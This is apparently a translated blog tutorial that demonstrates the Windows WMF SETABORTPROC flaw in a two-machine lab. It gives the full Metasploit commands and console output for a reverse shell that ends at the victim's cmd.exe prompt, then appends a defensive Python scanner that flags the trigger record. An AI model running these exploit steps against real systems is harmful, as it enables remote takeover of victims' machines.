Demonstrating the Windows WMF 0-day Exploit

Let's demonstrate the Windows WMF 0-day exploit vulnerability.
Using metasploit, we break into a Windows machine that comes to access our web server.
Do demonstrate this at your company as well, so people understand how frightening this vulnerability is and are prompted to take countermeasures immediately.
For countermeasures, refer to "Infocon goes Yellow! The danger of the Windows WMF 0-day is rising!!".

Points:
 Windows uses Shift-JIS, so set the terminal's character encoding (conversion mode) to "Shift-JIS".
 This lets you handle Japanese directory and file names once inside.
 Open the HTTPPORT (8080) used by the exploit and the LPORT (4321) used by the payload in the firewall.
IP addresses:
 Windows machine (the side being attacked) – 192.168.0.1
 Linux machine (the attacking side) – 192.168.0.10

Never abuse this!


$ wget http://www.metasploit.com/tools/framework-2.5-snapshot.tar.gz <<-- Download metasploit.
$ tar zxf framework-2.5-snapshot.tar.gz <<-- Extract the archive.
$ cd framework-2.5/ <<-- Change directory.
$ ./msfconsole <<-- Run metasploit.
Using Term::ReadLine::Stub, I suggest installing something better (ie Term::ReadLine::Gnu)


_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


+ -- --=[ msfconsole v2.5 [113 exploits - 74 payloads]

msf > show exploits <<-- List the available exploits.

Metasploit Framework Loaded Exploits
====================================

3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Overflow
aim_goaway AOL Instant Messenger goaway Overflow
altn_webadmin Alt-N WebAdmin USER Buffer Overflow
apache_chunked_win32 Apache Win32 Chunked Encoding
arkeia_agent_access Arkeia Backup Client Remote Access
arkeia_type77_macos Arkeia Backup Client Type 77 Overflow (Mac OS X)
arkeia_type77_win32 Arkeia Backup Client Type 77 Overflow (Win32)
awstats_configdir_exec AWStats configdir Remote Command Execution
backupexec_agent Veritas Backup Exec Windows Remote Agent Overflow
backupexec_dump Veritas Backup Exec Windows Remote File Access
backupexec_ns Veritas Backup Exec Name Service Overflow
backupexec_registry Veritas Backup Exec Server Registry Access
badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow
bakbone_netvault_heap BakBone NetVault Remote Heap Overflow
barracuda_img_exec Barracuda IMG.PL Remote Command Execution
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
cabrightstor_disco CA BrightStor Discovery Service Overflow
cabrightstor_disco_servicepc CA BrightStor Discovery Service SERVICEPC Overflow
cabrightstor_sqlagent CA BrightStor Agent for Microsoft SQL Overflow
cabrightstor_uniagent CA BrightStor Universal Agent Overflow
cacam_logsecurity_win32 CA CAM log_security() Stack Overflow (Win32)
cacti_graphimage_exec Cacti graph_image.php Remote Command Execution
calicclnt_getconfig CA License Client GETCONFIG Overflow
calicserv_getconfig CA License Server GETCONFIG Overflow
distcc_exec DistCC Daemon Command Execution
edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
freeftpd_user freeFTPd USER Overflow
futuresoft_tftpd FutureSoft TFTP Server 2000 Buffer Overflow
globalscapeftp_user_input GlobalSCAPE Secure FTP Server user input overflow
gnu_mailutils_imap4d GNU Mailutils imap4d Format String Vulnerability
google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution
hpux_ftpd_preauth_list HP-UX FTP Server Preauthentication Directory Listing
hpux_lpd_exec HP-UX LPD Command Execution
ia_webmail IA WebMail 3.x Buffer Overflow
icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)
ie_objecttype Internet Explorer Object Type Overflow
ie_xp_pfv_metafile Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution
iis40_htr IIS 4.0 .HTR Buffer Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
iis_fp30reg_chunked IIS FrontPage fp30reg.dll Chunked Overflow
iis_nsiislog_post IIS nsiislog.dll ISAPI POST Overflow
iis_source_dumper IIS Web Application Source Code Disclosure
iis_w3who_overflow IIS w3who.dll ISAPI Overflow
imail_imap_delete IMail IMAP4D Delete Overflow
imail_ldap IMail LDAP Service Buffer Overflow
irix_lpsched_exec IRIX lpsched Command Execution
lsass_ms04_011 Microsoft LSASS MSO4-011 Overflow
lyris_attachment_mssql Lyris ListManager Attachment SQL Injection (MSSQL)
mailenable_auth_header MailEnable Authorization Header Buffer Overflow
mailenable_imap MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow
mailenable_imap_w3c MailEnable IMAPD W3C Logging Buffer Overflow
maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow
mdaemon_imap_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
mercantec_softcart Mercantec SoftCart CGI Overflow
mercury_imap Mercury/32 v4.01a IMAP RENAME Buffer Overflow
minishare_get_overflow Minishare 1.4.1 Buffer Overflow
mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution
ms05_039_pnp Microsoft PnP MS05-039 Overflow
msasn1_ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow
msmq_deleteobject_ms05_017 Microsoft Message Queueing Service MSO5-017
msrpc_dcom_ms03_026 Microsoft RPC DCOM MSO3-026
mssql2000_preauthentication MSSQL 2000/MSDE Hello Buffer Overflow
mssql2000_resolution MSSQL 2000/MSDE Resolution Overflow
netterm_netftpd_user_overflow NetTerm NetFTPD USER Buffer Overflow
openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution
openview_omniback HP OpenView Omniback II Command Execution
oracle9i_xdb_ftp Oracle 9i XDB FTP UNLOCK Overflow (win32)
oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)
oracle9i_xdb_http Oracle 9i XDB HTTP PASS Overflow (win32)
payload_handler Metasploit Framework Payload Handler
php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution
php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution
php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution
phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution
poptop_negative_read Poptop Negative Read Overflow
realserver_describe_linux RealServer Describe Buffer Overflow
rsa_iiswebagent_redirect IIS RSA WebAgent Redirect Overflow
samba_nttrans Samba Fragment Reassembly Overflow
samba_trans2open Samba trans2open Overflow
samba_trans2open_osx Samba trans2open Overflow (Mac OS X)
samba_trans2open_solsparc Samba trans2open Overflow (Solaris SPARC)
sambar6_search_results Sambar 6 Search Results Buffer Overflow
seattlelab_mail_55 Seattle Lab Mail 5.5 POP3 Buffer Overflow
sentinel_lm7_overflow SentinelLM UDP Buffer Overflow
servu_mdtm_overflow Serv-U FTPD MDTM Overflow
shoutcast_format_win32 SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow
slimftpd_list_concat SlimFTPd LIST Concatenation Overflow
smb_sniffer SMB Password Capture Service
solaris_dtspcd_noir Solaris dtspcd Heap Overflow
solaris_kcms_readfile Solaris KCMS Arbitary File Read
solaris_lpd_exec Solaris LPD Command Execution
solaris_lpd_unlink Solaris LPD Arbitrary File Delete
solaris_sadmind_exec Solaris sadmind Command Execution
solaris_snmpxdmid Solaris snmpXdmid AddComponent Overflow
solaris_ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow
squid_ntlm_authenticate Squid NTLM Authenticate Overflow
svnserve_date Subversion Date Svnserve
trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow
uow_imap4_copy University of Washington IMAP4 COPY Overflow
uow_imap4_lsub University of Washington IMAP4 LSUB Overflow
ut2004_secure_linux Unreal Tournament 2004 "secure" Overflow (Linux)
ut2004_secure_win32 Unreal Tournament 2004 "secure" Overflow (Win32)
warftpd_165_pass War-FTPD 1.65 PASS Overflow
warftpd_165_user War-FTPD 1.65 USER Overflow
webstar_ftp_user WebSTAR FTP Server USER Overflow
windows_ssl_pct Microsoft SSL PCT MS04-011 Overflow
wins_ms04_045 Microsoft WINS MS04-045 Code Execution
wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow
zenworks_desktop_agent ZENworks 6.5 Desktop/Server Management Remote Stack Overflow

msf > use ie_xp_pfv_metafile <<-- Select the exploit.
msf ie_xp_pfv_metafile > show payloads <<-- List the available payloads.

Metasploit Framework Usable Payloads
====================================

win32_exec Windows Execute Command
win32_passivex Windows PassiveX ActiveX Injection Payload
win32_passivex_meterpreter Windows PassiveX ActiveX Inject Meterpreter Payload
win32_passivex_stg Windows Staged PassiveX Shell
win32_passivex_vncinject Windows PassiveX ActiveX Inject VNC Server Payload
win32_reverse Windows Reverse Shell
win32_reverse_dllinject Windows Reverse DLL Inject
win32_reverse_meterpreter Windows Reverse Meterpreter DLL Inject
win32_reverse_stg Windows Staged Reverse Shell
win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute
win32_reverse_vncinject Windows Reverse VNC Server Inject

msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse <<-- Set the payload.
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > show options <<-- Show the options and check which ones still need to be set.

Exploit and Payload Options
===========================

Exploit:    Name      Default  Description
--------    --------  -------  ----------------------------
optional    HTTPHOST  0.0.0.0  The local HTTP listener host
required    HTTPPORT  8080     The local HTTP listener port

Payload:    Name      Default  Description
--------    --------  -------  ------------------------------------------
required    EXITFUNC  thread   Exit technique: "process", "thread", "seh"
required    LHOST              Local address to receive connection
required    LPORT     4321     Local port to receive connection

Target: Automatic - Windows XP / Windows 2003 / Windows Vista

msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.10 <<-- LHOST is required but empty, so set it.
LHOST -> 192.168.0.10
msf ie_xp_pfv_metafile(win32_reverse) > show options <<-- Confirm that LHOST is now set.

Exploit and Payload Options
===========================

Exploit:    Name      Default       Description
--------    --------  ------------  ----------------------------
optional    HTTPHOST  0.0.0.0       The local HTTP listener host
required    HTTPPORT  8080          The local HTTP listener port

Payload:    Name      Default       Description
--------    --------  ------------  ------------------------------------------
required    EXITFUNC  thread        Exit technique: "process", "thread", "seh"
required    LHOST     192.168.0.10  Local address to receive connection
required    LPORT     4321          Local port to receive connection

Target: Automatic - Windows XP / Windows 2003 / Windows Vista

msf ie_xp_pfv_metafile(win32_reverse) > exploit <<-- Run the exploit.
[*] Starting Reverse Handler.
[*] Waiting for connections to http://192.168.0.10:8080/
<<-- Now waiting. Access http://192.168.0.10:8080/ from the vulnerable machine.
[*] HTTP Client connected from 192.168.0.1:2597, redirecting...
[*] HTTP Client connected from 192.168.0.1:2598, sending 1520 bytes of payload...
[*] Client supports gzip-encoded HTTP responses, compressing the WMF payload...
[*] Got connection from 192.168.0.10:4321 <-> 192.168.0.1:2599

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user1\デスクトップ> <<-- cmd.exe is running; the break-in is complete.
C:\Documents and Settings\user1\デスクトップ> <<-- Free to do anything (((( ;゚Д゚))) (shudder)
C:\Documents and Settings\user1\デスクトップ>exit <<-- Leave the Windows machine.
exit
[*] Exiting Reverse Handler.
msf ie_xp_pfv_metafile(win32_reverse) > exit <<-- Quit metasploit.
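As an added example (not part of the original post and not metasploit code), here is a small defensive check for the other side of this demo: a scanner that walks the records of a WMF file according to the public MS-WMF layout and flags any META_ESCAPE record carrying the SETABORTPROC escape, which is the mechanism the ie_xp_pfv_metafile module above relies on. It can be run over files pulled from a web proxy cache or mail gateway quarantine. The two sample files are constructed inline for the demonstration (a harmless one, and a minimal trigger-shaped one whose escape body is empty); they are not real captures and carry no payload.

```python
"""
WMF record scanner: flags META_ESCAPE records whose escape function is
SETABORTPROC, the trigger used by the WMF 0-day demonstrated above.

Layout per the public MS-WMF specification:
  optional placeable header: 22 bytes, starting with key 0x9AC6CDD7
  METAHEADER (18 bytes): mtType u16, mtHeaderSize u16 (in words),
      mtVersion u16, mtSize u32, mtNoObjects u16, mtMaxRecord u32,
      mtNoParameters u16
  records: rdSize u32 (size in 16-bit words, including itself),
      rdFunction u16, then parameters; the list ends with META_EOF
"""
import struct

PLACEABLE_KEY = 0x9AC6CDD7
META_EOF = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE = 0x0626
ESC_QUERYESCSUPPORT = 0x0008  # a harmless escape, used in the benign sample
ESC_SETABORTPROC = 0x0009     # the escape the scanner is looking for


def iter_records(data):
    """Yield (offset, function, params) for each record in a WMF blob."""
    off = 0
    if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_KEY:
        off = 22  # skip the placeable header
    if len(data) < off + 18:
        raise ValueError("truncated METAHEADER")
    header_words = struct.unpack_from("<H", data, off + 2)[0]
    off += header_words * 2
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:
            raise ValueError(f"bad record size at offset {off}")
        end = off + size_words * 2
        yield off, func, data[off + 6:end]
        if func == META_EOF:
            break
        off = end


def find_abortproc_escapes(data):
    """Return offsets of META_ESCAPE records carrying the SETABORTPROC escape."""
    hits = []
    for off, func, params in iter_records(data):
        if func == META_ESCAPE and len(params) >= 2:
            esc = struct.unpack_from("<H", params, 0)[0]
            if esc == ESC_SETABORTPROC:
                hits.append(off)
    return hits


# --- constructed sample data (test fixtures, not real files) -----------------

def build_record(func, params=b""):
    """Assemble one WMF record; parameters are padded to a whole word."""
    if len(params) % 2:
        params += b"\x00"
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params


def build_wmf(records):
    """Wrap records in a minimal METAHEADER and terminate with META_EOF."""
    body = b"".join(records) + build_record(META_EOF)
    max_rec = max(len(r) for r in records) // 2
    header = struct.pack("<HHHIHIH", 1, 9, 0x0300, (18 + len(body)) // 2, 0, max_rec, 0)
    return header + body


def with_placeable_header(data):
    """Prepend a placeable header (checksum left at zero; not verified here)."""
    return struct.pack("<IH8sHIH", PLACEABLE_KEY, 0, b"\x00" * 8, 96, 0, 0) + data


def make_benign_sample():
    # SETMAPMODE plus an ordinary QUERYESCSUPPORT escape: must not be flagged
    return build_wmf([
        build_record(META_SETMAPMODE, struct.pack("<H", 1)),
        build_record(META_ESCAPE, struct.pack("<HH", ESC_QUERYESCSUPPORT, 0)),
    ])


def make_suspicious_sample():
    # Same shape, but the escape function is SETABORTPROC with an empty body
    return build_wmf([
        build_record(META_SETMAPMODE, struct.pack("<H", 1)),
        build_record(META_ESCAPE, struct.pack("<HH", ESC_SETABORTPROC, 0)),
    ])


if __name__ == "__main__":
    import sys
    paths = sys.argv[1:]
    if not paths:  # no files given: run against the constructed samples
        for name, blob in (("benign", make_benign_sample()),
                           ("suspicious", make_suspicious_sample())):
            print(name, find_abortproc_escapes(blob))
    for p in paths:
        with open(p, "rb") as f:
            print(p, find_abortproc_escapes(f.read()))
```

The scanner checks only the escape function code, so it flags the trigger shape regardless of what (if anything) follows it; on a gateway that is the right trade-off, since no legitimate image has any business asking the printer subsystem to install an abort procedure. Files with the placeable header are handled as well.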
